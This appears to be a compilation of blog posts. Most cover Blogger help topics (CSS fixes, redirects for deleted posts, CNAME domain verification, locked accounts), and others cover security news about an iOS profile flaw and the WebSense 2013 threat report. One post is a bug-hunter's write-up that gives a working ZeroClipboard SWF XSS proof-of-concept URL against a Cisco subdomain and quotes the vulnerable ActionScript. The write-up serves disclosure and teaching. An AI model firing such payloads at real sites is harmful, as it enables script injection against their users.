As an alternate solution, you may add CSS which will hide the warning. Using the "Add CSS" wizard in the Template Designer Advanced menu, add the following code:

#fb_xdm_frame_http, #fb_xdm_frame_https
{
 display:none !important;
}

As always, after you add or remove the code in question, and save the changes, you will need to clear browser cache and restart the browser, to accurately test success in resolving the problem.

>> Top

Read More

Recovering A Deleted Page Or Post, Chapter 2

Blog owners have been deleting their pages and posts, then changing their minds later, since Blogger started providing the ability to delete pages and posts.

We've been advising anxious blog owners, for some time, how to recover deleted pages and posts. The easiest solution, in the long run, is to recover the PageID / PostID, and re publish the deleted page / post.

When the deleted page or post cannot be re published, the next option is to re build the page / post, possibly using feed cache.

Using this technique, you'll have to reformat the post content, as feed content is formatted relatively simply. When you publish the post, it will publish as a new post, with a new URL - so any external references to the missing post URL will still be broken.

Thanks to the recently offered Custom Redirects option, though, we can make this latter choice slightly less undesirable.

When a deleted page or post has to be rebuilt from the beginning, the classic prognosis was not good.

1. The content is retrieved or rewritten, then re formatted.
2. The page / post is re published, but under a new URL.
3. The readers, and the search engines, adjust to the new URL being used.

For many blog owners, issue #3 is the cruelest blow - as the blog suffers reputation loss, from readers and search engines seeing

404 Not Found

for the deleted page / post.

Given enough determination and time, the blog owner can get through issues #1 and #2 - but issue #3 is the gift that just keeps on giving. Using Custom Redirects, though, that does not have to be the case.

It's a simple solution - and your readers and the search engines don't have to do anything unusual.

1. Rebuild the page / post, using a carefully chosen Title / URL.
2. Add a Custom Redirect.
   • From: The deleted (previously published) URL.
   • To: The new (re published) URL.
3. The readers, and the search engines can view the re built page / post contents using the old URL - and update their record of the URL, as convenient to them, to point to the new URL. And the page / post never goes offline.

And you, the blog owner, can get back to work on new pages and posts.

>> Top

Read More

Confusion About Advice "If you bought your domain name from Blogger, you won't need to create a CNAME record."

To Blogger blog owners who want their new non BlogSpot URLs to display their blogs, this conflicting bit of advice provides only confusion and doubt.

If you bought your domain name from Blogger, you won't need to create a CNAME record.

That advice was written to advise the use of the Blogger "Buy a domain" wizard, which provides non BlogSpot URLs for Blogger blogs, through a simple 15 minute purchase process. In September 2012, that simple process changed, slightly.

If you are trying to re publish your blog to a non BlogSpot URL - and you are seeing an "Error 12" / "Error 32", or similar message in the Publishing wizard display - you need to add a second "CNAME" address to your domain.

The new "CNAME", added in September 2012, allows you to verify ownership of the domain to the Publishing wizard. Any time you re publish your blog to a non BlogSpot URL, you have to verify ownership. This prevents people who are not you from deviously publishing their Blogger blog to your domain.

If you are reading this, and you are the owner of any website which provides advice on how easy it is to purchase a non BlogSpot URL for a Blogger blog - and part of your advice mentions

If you bought your domain name from Blogger, you won't need to create a CNAME record.

Please, edit your instructions to reflect the reality of domain ownership verification.

If you are reading this, and you know of a blog or website which provides the confusing advice

If you bought your domain name from Blogger, you won't need to create a CNAME record.

let us know, below.

Try and reduce the confusion, when people have to re publish their blog, after using the Blogger Publishing wizard - or possibly after buying directly from a registrar. Help us, to help you.

>> Top

Read More

Cisco ZeroClipboard Swf File XSS

The security of  the target website depends upon the number of vectors an attacker knows, The more vectors an attacker knows the more chances he would have for compromising your website. One of the reasons why i have managed to secure my places in most of the security hall of fames was that i did not tried a single attack vectors, i tested a the target for lots of different attack vectors, one of them was swf. swf files are commonly found on mots of the websites. Though there are lots of other vulnerabilities for swf files, however i would stick to the topic of this post and would leave other's for upcoming posts.
Recently, i was testing cisco for potential vulnerabilities, initially i took tested for SQLi, XSS, CSRF and other attacks, but was out of luck. Therefore, i decided to test it for swf file vulnerabilities. One of the common swf vulnerabilities i look for inside a website is for "ZeroClipboard Xss".

What Is ZeroClipboard?

The ZeroClipboard library provides an easy way to copy text to the clipboard using an invisible Adobe Flash movie, and a JavaScript interface. The "Zero" signifies that the library is invisible and the user interface is left entirely up to you.


I used google to search, if any of cisco's subdomain or cisco.com itself contain this file, luckily i found the path to bx.cisco.com that contained zeroclipboard.xss. So i began testing for XSS and bingo it worked.


Cisco Swf POC

http://bx.cisco.com/cbx-portal/js/zeroclipboard/ZeroClipboard.swf#?id=\"))}catch(e){alert(/XSSbyrafay/.source);}//&width=500&height=500

Vulnerable Code

public function ZeroClipboard()
{ .... var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters; id = flashvars.id; .... 
ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);

As you can look from the above code is that id parameter from Externalinterface.call is passed to the second parameter, without being properly sanitized. Therefore it results into an XSS.

Further Reading

If you are really interested in learning about zeroclipboard xss, i would recommend you read the following articles:

http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html
https://github.com/jonrohan/ZeroClipboard/issues/14

Read More

Vulnerability Discovered In iPhone - Poses Serious Threat To Users

Another vulnerability has been discovered on iPhone that could allow hackers to remotely control it. Skycure, an Israeli company, states it to be a major flaw in iOS configuration which could post a malware threat.

A file known as mobileconf is being attacked due to this vulnerability. This file is used by phones carriers to configure system-level settings including WiFi, VPN, email and APN.

Skycure's CEO, Adi Sharabani, has taken the exploit to a test drive to explain how an iPhone can be controlled while retrieving victim's location and other sensitive information.

Ways to get infected:

1. Victims browse to an attacker-controlled website, which promises them free access to popular movies and TV-shows. In order to get the free access, “all they have to do” is to install an iOS profile that will “configure” their devices accordingly.
2. Victims receive a mail that promises them a “better battery performance” or just “something cool to watch” upon installation.

To avoid this attack one must follow these rules:

• You should only install profiles from trusted websites or applications.
• Make sure you download profiles via a secure channel (e.g., use profile links that start with https and not http).
• Beware of non-verified mobileconfigs. While a verified profile isn't necessarily a safe one, a non-verified should certainly raise you suspicion.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Read More

Accounts Locked For Unusual Account Activity

One of the more intriguing tales of Blogger blogs, currently being explored, involves blogs mysteriously deleted by Blogger.

My blog just disappeared from my dashboard - and no, it's not listed under "Deleted blogs"!

In some cases, the owner knows more than is implied, from the obvious wording of that problem report.

As Blogger / Google continues to improve the hacking / malware detection and removal process, they are making the recovery of accounts locked for "suspicious" / "unusual" activity easier - and more transparent. The increased transparency may, in some cases, cause mystery.

Diagnosing the many mysterious blog disappearances, currently being reported in Blogger Help Forum: Something Is Broken, may involve what the blog owner does not report - as much as what the owner does report.

Hacking Detection / Recovery is constantly being improved.

Blogger / Google is constantly refining the hacking detection / recovery process, to both improve the possibility that any activity will be detected, and to make it easier for the victims of the hacking to deal with the recovery process. As they make it easier for the owners to recover the accounts locked, they make it less likely that the owners will mention the locked account recovery, when later reporting the blogs, mysteriously missing from the dashboard.

Some owners will provide vague clues, alluding to hacking detection.

In some cases, the blog owner will provide vague clues, which refer to an immediately previous account unlock.

• Required to change the account password.
• Required to provide a phone number - and receive either a text or voice message with a recovery code.
• Required to solve a CAPTCHA.

All of these clues can be relevant to a locked account, or to various other anti-hacking / anti-spam activity by Blogger / Google - and can be overlooked as a locked account symptom, when stated in a forum problem report.

Other times, only the circumstances identify the situation.

In other cases, the only clue provided will be that the blogs in question are missing, and not listed in any dashboard list - "Deleted blogs", "Locked blogs", or "My blogs". In cases where we've simply reported missing blogs for malware / spam review, to Blogger Support, we're later advised to instruct the blog owner to recover the account.

Every owner does not always appreciate the diagnostic process.

Since immediate review of any blog cannot be always guaranteed by Blogger Support, it's to everybody's benefit that we request clues to verify the problems being reported. Unfortunately, the questions asked may not always seem relevant to some blog owners, unhappy about the mysterious loss of their blogs - even though they may contribute to the problem, inadvertently.

All owners won't even get email, alerting them to action taken.

And thanks to the possibility that not all blog owners may even get a notice when their accounts are locked, owners with multiple accounts may not even realise that a given Blogger account is locked. These owners find out that a given blog has been deleted, only after it goes offline and expires from cache. This will make some blog owners even less cooperative, when asked to provide diagnostic details about their problems.

Read More

600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013

One thing I love more than writing is online threat reports - all the blood, sweat and tears combined with the satisfaction of discovery and elimination of the threat. Ahh! The moment you come to the realisation that there are smarter people in this world who can shoot you point-blank without ever being caught. Yes, brutality is the name, the name of the game!


WebSense has kept up to speed in this game and they have released a report to show for it. WebSense has released the 2013 Threat report enumerating an analysis on cyber threats. According to WebSense, cyber threats have increased over the years due to usage of ancient security protocols. Attackers are able to easily bypass these mechanisms and target mobile platforms and social media, the two most celebrated inventions of this century.

Internet has been reported to be the 'attack vector and the primary support element of other attack trajectories'. Malicious websites have grown in number (almost 600%) and 85% of these are being hosted by legitimate but compromised providers.

Genre of sites that were mainly attacked were:

• Information Technology
• Business and Economy
• Sex
• Travel
• Shopping

Probably because attackers wanted to cover all areas of human psyche and, in general, life? No wonder the number of threats and attacks have increased.

- Social Media was one of the most exploited channels due to its large audience. Most of the links consisted of malicious content which were spread through the network. New features and interfaces also resulted in some amount of confusion leading to successful attacks on the user.

- Mobile Platform were again easily attacked due to jailbreaking, and download and installation of malicious apps.

Legitimate apps were also a cause for concern; many proved less secure than expected. Consider a study by Philipps University and Leibniz University in Germany involving 13,500 free apps downloaded from Google Play. Researchers found that 8 percent of these apps were vulnerable to man-in-the-middle attacks, and approximately 40 percent enabled the researchers to capture credentials for American Express, Diners Club, Paypal, bank accounts, Facebook,Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, remote control servers, arbitrary email accounts, and IBM Sametime, among others.

WebSense stated that malicious apps mainly require three permissions:

• 82% of malicious apps send, receive, read or write SMS message.
• 12.5% malicious apps require RECEIVE_WAP_PUSH permission.
• 10% malicious apps asked for permission to install other apps.

- Email was another vector that took to WebSense's notice as only 20% of the emails sent and received were legitimate. 80% were phishing and spam emails. It is very easy to fall pry to such attacks because the links present in these emails seem to be from "real people" but basically consist of links to compromised websites or the attachments present in them are infected.

Report also introduced "time-delay" attack, "in which embedded web links are kept benign until after traditional email security defences are bypassed".

According to WebSense the following categories of malicious web links are present in Spam Email:

• Potentially Damaging Content | Suspicious sites with little or no useful content.
• Web and Email Spam | Sites used in unsolicited commercial email.
• Malicious Websites | Sites containing malicious code.
• Phishing and other Frauds | Sites that counterfeit legitimate sites to elicit user information.
• Malicious Embedded iFrame.

You can read the full report by WebSense which clearly states;

“Solutions that focus solely on mobile, email, web or otherwise can no longer be trusted to defend against complex, multistage attacks that can move between attack vectors.”

Wise friends, we are no longer... ALONE!

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Read More